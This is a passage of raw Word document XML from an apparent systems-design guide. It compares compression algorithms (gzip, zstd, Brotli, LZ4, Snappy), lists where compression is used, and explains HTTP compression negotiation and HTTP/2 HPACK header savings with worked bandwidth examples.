      </w:r>
    </w:p>
    <w:p w14:paraId="0847C828" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>CPU is available (not already at 100%).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D66971" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When compression hurts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097F5C1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Data is already compressed (images, video, encrypted data — compression adds CPU but saves no bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBE7ED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>CPU is the bottleneck (spending more CPU on compression reduces request throughput).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD177D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Low-latency paths where compression adds measurable delay (same-rack communication where bandwidth is plentiful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583AC637" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compression algorithms comparison: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07"/>
        <w:gridCol w:w="2023"/>
        <w:gridCol w:w="1615"/>
        <w:gridCol w:w="1880"/>
        <w:gridCol w:w="2325"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="33D5D1B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D30179" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Algorithm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EC6275" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Compression Ratio (text)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8A2B19" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Compress Speed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A43D05" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Decompress Speed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C5A19D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="275816D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DC0C77" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>gzip (level 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D6EBAE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>70–80% reduction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1C1967" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>50–100 MB/s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0737D1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>300–400 MB/s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F53DFE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>HTTP responses, general purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2A5F4E0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71CABD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>zstd (level 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7BA62E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>70–80% reduction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A2ED62" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>300–500 MB/s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7984B2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1000+ MB/s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E46E10" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Modern replacement for gzip. Better ratio at same speed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5FD1E7C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404F50" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>zstd (level 19)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2F6676" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>80–85% reduction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7A91C3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10–20 MB/s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36B7F7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1000+ MB/s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3C3534" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Archival, cold storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6B51ABA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B4A51E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Brotli (level 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2F26BF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>75–85% reduction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EE45BB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>30–80 MB/s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F5D055" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>300–400 MB/s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460599" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>HTTP responses (better ratio than gzip)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="493469D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33F7AC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:lastRenderedPageBreak/>
              <w:t>LZ4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B143A5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>50–60% reduction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7CF9B1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>3000+ MB/s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83D299" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>4000+ MB/s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32DC25" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Real-time, low-latency (Kafka, databases)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2443FB3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CDDE68" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Snappy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DA328B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>50–60% reduction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D1D497" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>2000+ MB/s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D57361" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>2000+ MB/s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B837DD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Columnar storage, real-time processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F095654" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Where compression is applied in practice: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264"/>
        <w:gridCol w:w="2116"/>
        <w:gridCol w:w="4970"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="41B3C38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41BD32" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Layer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03D11F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Compression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7A87AC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="46C14EA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60D70E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>HTTP response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26F2BA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>gzip/Brotli/zstd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3A9DB7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Content-Encoding: br header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="32A887D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F2EFA1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>gRPC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DFA53F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>gzip, snappy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D30660" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Per-message compression</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="755BDFC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6F66F3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Kafka messages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CD1BB7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>LZ4, zstd, snappy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AD3876" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Producer-side compression, broker stores compressed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5DE250D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A5D2FA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Database storage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9BA573" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>LZ4, zstd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270471" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Page-level compression (InnoDB, PostgreSQL TOAST)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2173D93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43662C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Object storage (S3)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B396AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Client-managed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A84BE2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Compress before upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="3F8DE2F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602090" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Log shipping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CE2681" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>zstd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A7F5CF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>High ratio, fast decompression for search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="110D0C4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48CC43" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Database replication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D0F877" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>LZ4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D8A3B5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Compress WAL before network transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C9BE79D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP compression negotiation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44114F3F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719FC3A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Request:  Accept-Encoding: gzip, br, zstd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE1CD4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Response: Content-Encoding: br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4D019" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          (body is Brotli-compressed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E403C41" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>The server chooses the best mutually-supported algorithm. Brotli typically gives 15–25% better compression than gzip for HTML/JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154560A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Protocol Optimization — Reducing Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B75A1F6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 → HTTP/2 bandwidth savings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD33C86" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>HTTP/1.1 headers are text, repeated on every request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5B893" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046955A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>GET /api/users HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC6F25" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Host: api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0A2ED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129738B0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Accept: application/json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E668291" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cookie: session=abc123; preferences=dark_mode; tracking=xyz789...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DABCB38" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Headers can be 500 bytes–2 KB per request. At 10,000 requests/second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FF551" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D92F353" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Header overhead: 10,000 × 1 KB = 10 MB/s = 80 Mbps (just for headers!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D9B41" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 HPACK header compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A0039" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Maintains a shared table of previously-sent headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61379553" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Subsequent requests send only the INDEX of the header (1 byte instead of 500 bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C686C7E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Headers that change are Huffman-encoded and delta-compressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D16E15C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Typical header compression: 85–95%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D05A1E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E069E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>After HPACK: 10,000 × 50 bytes = 500 KB/s = 4 Mbps (vs 80 Mbps — 20x reduction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F0AD73" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC + Protobuf bandwidth savings over REST + JSON:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AC449" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7488DE23" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>// JSON (150 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BED8B4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>{"user_id": 12345, "name": "Alice Smith", "email": "alice@example.com", "age": 30, "active": true}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C521F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
